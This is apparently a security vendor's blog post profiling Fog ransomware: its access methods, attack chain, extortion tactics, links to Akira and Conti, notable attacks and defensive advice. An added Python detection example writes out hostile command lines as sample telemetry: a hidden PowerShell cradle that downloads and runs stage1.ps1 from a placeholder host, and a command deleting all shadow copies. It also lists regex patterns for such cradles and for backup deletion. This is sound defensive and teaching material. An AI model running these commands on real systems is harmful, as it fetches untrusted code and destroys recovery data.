
A closer look at Fog ransomware
Fog ransomware emerged in April 2024 as a sophisticated cyberthreat that combined rapid encryption with double extortion tactics. Fog threat actors initially targeted educational institutions through compromised VPN accounts. They soon expanded their scope to government agencies and business sectors. As of February 2025, the top five sectors victimized by Fog are business services, technology, education, manufacturing, and government. Most of Fog’s victims are based in the United States.
Researchers suspect that Fog threat actors operate from Russia or other former Soviet nations, because they conspicuously avoid targeting Eastern European countries and the People’s Republic of China. In a 2024 attack, researchers traced the origin of a Fog-related IP address to Moscow.
Group or variant?
Analysts have been careful to distinguish Fog ransomware as a variant, rather than a threat group. There doesn’t appear to be any evidence of a centralized operation behind the use of Fog. It can be used by different threat actors to carry out attacks, and the developers are separate from those performing the intrusions.
Ransomware-as-a-Service (RaaS) affiliates also operate separately from ransomware developers, but there is always evidence of an organizational hierarchy or a separation of duties behind the software. There are rules and payment structures for the affiliates. We can’t consider Fog a RaaS operation because it doesn’t fit that description.
We also can’t rule out the possibility that Fog is or was intended to be used in a RaaS operation. Its modular design allows attackers to control what gets encrypted, the pace of the attack, the scope of encryption, and the content of the ransom note. It’s possible that it was developed with a RaaS operation in mind.
Although Fog doesn’t appear to be a single organization, it does fit the commonly understood parameters of a ‘threat actor group.’ Fog attackers share infrastructure and malware, they have common tactics, techniques, and procedures (TTPs), and they use similar phishing emails, ransom notes and negotiation chats across attacks. There is also a Fog branded leak site and negotiation portal, which means these threat actors are coordinating on how they communicate with the victims.
Fog actors have also been observed communicating during attacks using command-and-control (C2) servers and encrypted communication channels.
Fog by the numbers
Based on available data, analysts have calculated the following metrics:
- Number of publicly reported victims: 189 as of April 2025
- Median initial ransom demand: $220,000
- Median ransom payment: $100,000
The amount collected by Fog is unknown. If all publicly reported victims paid the median ransom payment, that would be $18.9 million. We know that not all victims pay the ransom, and not all incidents are reported. A recent survey found that 86% of organizations (globally) have paid ransom demands in the past year, which is interesting, but probably not applicable to victims of Fog.
There is no evidence that Fog threat actors are motivated by anything other than money. They have not declared any nation-state allegiance or shown support for an ideology or cause.
How Fog works
Fog usually spreads through one of the following initial access methods:
- Compromised SonicWall VPN accounts: These accounts are usually purchased through an initial access broker (IAB) but could be stolen directly through phishing campaigns.
- Vulnerability exploitation: Fog actors actively target unpatched software, particularly Veeam Backup & Replication (CVE-2024-40711).
- Phishing campaigns: Fog threat actors use phishing campaigns to deploy the ransomware loader. These emails usually pose as a VPN update request, an unpaid invoice inquiry, or a human resources (HR) policy change notification. The attachments behave differently, but all result in attempts to download the Fog ransomware loader.
Recent phishing campaigns have used phishing emails with a ZIP file attachment that contains a malicious LNK shortcut. The LNK file executes a command that downloads a PowerShell script named "stage1.ps1" from an attacker-controlled domain. The script then downloads several payloads and supporting files. Ransom notes associated with these attacks have added insult to injury by mocking victims with references to Edward Coristine and the U.S. Department of Government Efficiency (DOGE).

Fog phishing email - fake VPN update (mockup)
Researchers have determined there is no real affiliation between Fog ransomware and DOGE.
Once inside the system, Fog immediately begins system reconnaissance and attempts to establish persistence by modifying system configurations and deploying additional scripts that keep the malware active after a system reboot. The next step is to gain administrative control by using tools like Mimikatz and techniques like LSASS memory dumping and NTLM relay attacks. Fog will also establish anti-recovery measures, like encrypting backups and deleting volume shadow copies.
The attack proceeds with lateral movement and data exfiltration. Fog actors use the zero-knowledge cloud service Mega.nz to store stolen data prior to encrypting the network. This sets up the double extortion scheme. When this is complete, Fog will encrypt documents, databases, backups, and any other critical operational data. The extensions .fog, .Fog, or .FLOCKED are appended to the encrypted files, and ransom notes named "readme.txt" are distributed across the network. The victim's information is added to the Fog leak site.
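The phishing chain above (ZIP, then LNK, then a PowerShell download of "stage1.ps1") and the post-access stage (shadow copy deletion, .fog/.Fog/.FLOCKED extensions, readme.txt ransom notes) both leave traces in endpoint telemetry. The following is an added example of detection logic for those traces, not code from the original post or from any Barracuda product. The event records and their field names (kind, host, parent, image, cmdline, path) are constructed for the example and do not follow any vendor's schema; the alert names and the rule that readme.txt only fires alongside encrypted extensions on the same host are design choices of this example.

```python
"""Detection rules for the Fog intrusion chain (added example, constructed data)."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (process creation) or "file" (file write)
    host: str
    parent: str = ""     # parent process image name (process events)
    image: str = ""      # process image name (process events)
    cmdline: str = ""    # full command line (process events)
    path: str = ""       # written file path (file events)


# Constructed sample telemetry: one workstation hit by the LNK/PowerShell chain,
# one server showing anti-recovery and encryption activity, one benign host.
SAMPLE_EVENTS = [
    Event("process", "ws01", parent="explorer.exe", image="cmd.exe",
          cmdline='cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/stage1.ps1 '
                  '-OutFile $env:TEMP\\stage1.ps1; & $env:TEMP\\stage1.ps1"'),
    Event("process", "ws01", parent="cmd.exe", image="powershell.exe",
          cmdline='powershell -w hidden -c "iwr http://example.invalid/stage1.ps1 -OutFile ..."'),
    Event("process", "srv02", parent="cmd.exe", image="vssadmin.exe",
          cmdline="vssadmin.exe delete shadows /all /quiet"),
    Event("file", "srv02", path=r"D:\finance\q1_report.xlsx.fog"),
    Event("file", "srv02", path=r"D:\finance\readme.txt"),
    Event("file", "srv02", path=r"D:\hr\payroll.db.FLOCKED"),
    Event("process", "ws03", parent="explorer.exe", image="powershell.exe",
          cmdline="powershell.exe Get-ChildItem C:\\Users"),      # benign admin use
    Event("file", "ws03", path=r"C:\Users\a\notes.txt"),          # benign file
]

# A script host fetching a .ps1 from the network (common PowerShell download cradles).
DOWNLOAD_CRADLE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b.*\.ps1",
    re.IGNORECASE)
# Shadow copy / backup catalog deletion, the anti-recovery step described above.
SHADOW_DELETION = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|wbadmin(\.exe)?\s+delete\s+catalog)",
    re.IGNORECASE)
# Extensions named on the page: .fog, .Fog, .FLOCKED (matched case-insensitively).
ENCRYPTED_EXT = re.compile(r"\.(fog|flocked)$", re.IGNORECASE)
RANSOM_NOTE = "readme.txt"
USER_SHELLS = {"explorer.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def is_lnk_download_chain(ev: Event) -> bool:
    """Script host launched from the user's shell (how a clicked LNK appears) or from
    another script host, whose command line downloads and runs a .ps1."""
    return (ev.kind == "process"
            and ev.parent.lower() in USER_SHELLS | SCRIPT_HOSTS
            and ev.image.lower() in SCRIPT_HOSTS
            and DOWNLOAD_CRADLE.search(ev.cmdline) is not None)


def is_shadow_copy_deletion(ev: Event) -> bool:
    return ev.kind == "process" and SHADOW_DELETION.search(ev.cmdline) is not None


def is_encrypted_file(path: str) -> bool:
    return ENCRYPTED_EXT.search(path) is not None


def is_ransom_note(path: str) -> bool:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower() == RANSOM_NOTE


def detect(events):
    """Return {host: sorted alert names}. A readme.txt write only raises an alert when
    the same host also shows encrypted extensions, since the name alone is too noisy."""
    alerts = {}
    notes_seen, encrypted_seen = set(), set()
    for ev in events:
        host_alerts = alerts.setdefault(ev.host, set())
        if is_lnk_download_chain(ev):
            host_alerts.add("lnk_powershell_download")
        if is_shadow_copy_deletion(ev):
            host_alerts.add("shadow_copy_deletion")
        if ev.kind == "file":
            if is_encrypted_file(ev.path):
                encrypted_seen.add(ev.host)
                host_alerts.add("fog_encrypted_extension")
            if is_ransom_note(ev.path):
                notes_seen.add(ev.host)
    for host in notes_seen & encrypted_seen:
        alerts[host].add("fog_ransom_note_with_encryption")
    return {h: sorted(a) for h, a in alerts.items() if a}


if __name__ == "__main__":
    for host, names in detect(SAMPLE_EVENTS).items():
        print(host, ", ".join(names))
```

Run on the constructed events, ws01 is flagged for the download chain, srv02 for shadow copy deletion, encrypted extensions and the correlated ransom note, and ws03 produces nothing. The per-host correlation matters in practice: "readme.txt" is a common filename, so it is treated as an indicator only when it appears next to the encrypted-extension evidence.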
After the attack
Negotiation tactics follow those of other groups.
If you want your data fully decrypted and the files we stole removed from our source, you will have to pay a fee. We will also be able to provide a security report and explain how we did it to get in. (source)
Fog starts with a high ransom demand and will compromise on a lower amount if it is acceptable.
Upon payment, Fog will send decryption keys and confirm the deletion of the stolen data. In two of the chats available here, the victim had difficulties recovering and had to troubleshoot with the threat actor.
The security report promised by Fog probably isn’t useful for victims that are already following best practices.
Access to your network was gained through a phishing mail. Your staff should be more vigilant when downloading and opening unfamiliar files. We recommend that you implement the following measures to protect your corporate network: 1) Enforce passwords on local and domain admins. Complicate group policy on passwords for all users; 2) Using the group "Protected users"; 3) Use centralised management of antivirus protection; 4) Inform users not to open suspicious emails and files; 5) Updating software and OS to current versions; 6) Set up permission delegations in the Active Directory; 7) Install an application to monitor activity in the Active Directory; 8) Use Vmware Esxi ver. 7.0 or more current. Our team guarantees that any data taken from your network will not be disclosed, sold or published. Of course, this dialogue will also remain confidential. (source)
The language is similar to the 'detailed security reports' provided by Akira.
Friends and family
Fog is barely a year old, but researchers suspect its operators are experienced ransomware threat actors. An analysis of Fog intrusions via compromised SonicWall VPN accounts shows that only 25% of the intrusions were linked directly to Fog. The remaining 75% of Fog intrusions were linked to Akira ransomware, suggesting collaboration and shared infrastructure. Fog and Akira also use similar tools and exploits and are known for their rapid encryption techniques.
Fog has also been linked to Conti ransomware through shared cryptocurrency wallets. Researchers linked Akira to Conti in 2023, so the link to Conti is not surprising, but it is noteworthy to investigators and researchers. Here's the high-level overview of the Conti family:
- Ryuk: August 2018 - early 2022. Evolved from Hermes and is the direct precursor to Conti.
- Conti: December 2019 - June 2022. Shut down and splintered into multiple groups.
- Karakurt: Emerged in June 2021 and active as of 2025. Spinoff of Conti.
- Quantum: Emerged in August 2021 and active as of 2025. Rebrand of MountLocker with ties to Conti.
- BlackByte: Emerged in Mid-2021 and active as of 2025. Conti affiliate.
- Zeon: January 2022 - September 2022. Direct precursor to Royal with ties to Conti.
- Royal: September 2022 - Mid/Late 2023. Rebrand of Zeon that evolved into BlackSuit.
- Black Basta: Emerged in April 2022 and active as of 2025. Spinoff of Conti.
- Akira: Emerged in March 2023 and active as of 2025. Closely linked to Conti.
- BlackSuit: Emerged in Mid-2023 and active as of 2025. Rebrand or evolution of Royal.
- Fog: Emerged in April 2024 and active as of 2025. Linked to Akira and Conti.
Conti was first observed in December 2019 and was fully offline by June 2022. Looking at Fog ransomware in this context underscores the fact that new does not mean inexperienced. Criminal expertise, code advancements and attack techniques move fluidly between these groups.
Notable attacks
In June 2024, Darktrace observed multiple Fog ransomware attacks across customer environments, including one that took less than two hours from initial access to complete file encryption. This was the first attack to demonstrate Fog’s speed and sophistication. The attack methods included outgoing NTLM authentication attempts to another internal device, which was then used to establish a remote connection to a Windows server running Hyper-V. This attack was notable for its speed and efficiency, and is one of the first indicators that multiple Fog actors collaborate in real time.
One of the most interesting attacks took place in August 2024, when Fog targeted a financial services company. Intruders logged in through a VPN account using stolen credentials. Security teams traced the IP of this intruder to Moscow, providing researchers with their first evidence of Fog’s Russian origins. The attack was also one of the first that targeted a sector other than education. The attack was detected prior to encryption and was therefore unsuccessful.
Fog threat actors targeted the Brazilian Government Ministries in July 2023, resulting in the compromise of nine ministries, the nation’s mint, and its anti-money laundering agency. Attackers demanded $1.2 million, but there is no evidence that a ransom was paid. The incident is still under investigation.
This attack was claimed by Fog in the ransom note and the victim is listed on the Fog leak site, but it did take place nine months before Fog emerged as a threat. This is possible because the emergence of a threat commonly refers to when a threat is observed and publicly acknowledged. There can be a significant delay between the first attack and the first industry / researcher observation. After a threat emerges, researchers begin to connect the new threat with old attacks. This is referred to as ‘retrospective linking.’
Defend yourself
Defending against Fog and other ransomware threat actors starts with best practices and layered security. Start with strong authentication systems that include multifactor authentication (MFA) and zero trust access. Maintain a strong patch management system and close exposures such as unused VPN accounts.
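Since compromised VPN accounts are Fog's most common entry point, a periodic review of which VPN accounts are still in use and which lack MFA is a concrete version of the advice above. The following is an added example of such a review, not code from the original post or from any Barracuda product. The account records, their field names (user, last_login, mfa_enabled, enabled) and the 90-day staleness threshold are constructed assumptions, not any vendor's export format or a recommended policy value.

```python
"""VPN account hygiene review (added example, constructed data)."""
from datetime import date, timedelta

STALE_AFTER = timedelta(days=90)   # assumed policy threshold for "unused"

# Constructed account export; a real one would come from the VPN or directory.
ACCOUNTS = [
    {"user": "jsmith",      "last_login": date(2025, 2, 10), "mfa_enabled": True,  "enabled": True},
    {"user": "contractor7", "last_login": date(2024, 6, 1),  "mfa_enabled": False, "enabled": True},
    {"user": "svc_backup",  "last_login": None,              "mfa_enabled": False, "enabled": True},
    {"user": "former_emp",  "last_login": date(2024, 11, 3), "mfa_enabled": True,  "enabled": False},
    {"user": "mlee",        "last_login": date(2025, 2, 25), "mfa_enabled": False, "enabled": True},
]


def recommended_action(stale: bool, no_mfa: bool) -> str:
    """Map the two hygiene gaps to a single action, worst case first."""
    if stale:
        return "disable"              # unused accounts are pure attack surface
    if no_mfa:
        return "enforce_mfa"          # active account, but one stolen password away
    return "ok"


def review_accounts(accounts, today: date):
    """Return [(user, action)] for every enabled account that needs attention.
    Accounts that never logged in (last_login is None) count as stale."""
    findings = []
    for a in accounts:
        if not a["enabled"]:
            continue                  # already disabled, nothing to do
        stale = a["last_login"] is None or today - a["last_login"] > STALE_AFTER
        no_mfa = not a["mfa_enabled"]
        action = recommended_action(stale, no_mfa)
        if action != "ok":
            findings.append((a["user"], action))
    return findings


if __name__ == "__main__":
    for user, action in review_accounts(ACCOUNTS, date(2025, 3, 1)):
        print(f"{user}: {action}")
```

With the constructed data and a review date of 2025-03-01, the unused contractor and service accounts are recommended for disabling, the active account without MFA gets an MFA enforcement recommendation, and accounts that are already disabled or in good standing are skipped.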
You can restrict the movement of intruders by segmenting networks and isolating sensitive data and backup systems. Zero trust access enables microsegmentation by isolating individual workloads and applying continuous verification across users and devices.
Consider adding advanced security to your network with Barracuda Managed XDR. This solution can identify and stop Fog’s malicious activities before encryption and data exfiltration. See our blog here for a minute-by-minute breakdown of how our team stopped an attack by Akira ransomware.
Use a top-tier backup solution to protect your data, system states and device configurations, databases, virtual machines, Entra ID data, SharePoint and Microsoft 365 deployments, and anything else you can’t afford to lose. Barracuda offers multiple data protection solutions for on-premises, cloud and hybrid environments.
And finally, maintain an up-to-date security awareness training program for employees. All network users should know how to recognize suspicious emails. Invest in a training program that can simulate attacks with samples of the most current phishing campaigns.
Barracuda can help
Barracuda security solutions are powered by AI and global threat intelligence. Our solutions fiercely defend all attack vectors with advanced threat protection and automated incident response that can be orchestrated across solutions. Visit our website to schedule a demo and see how it can help protect your environment.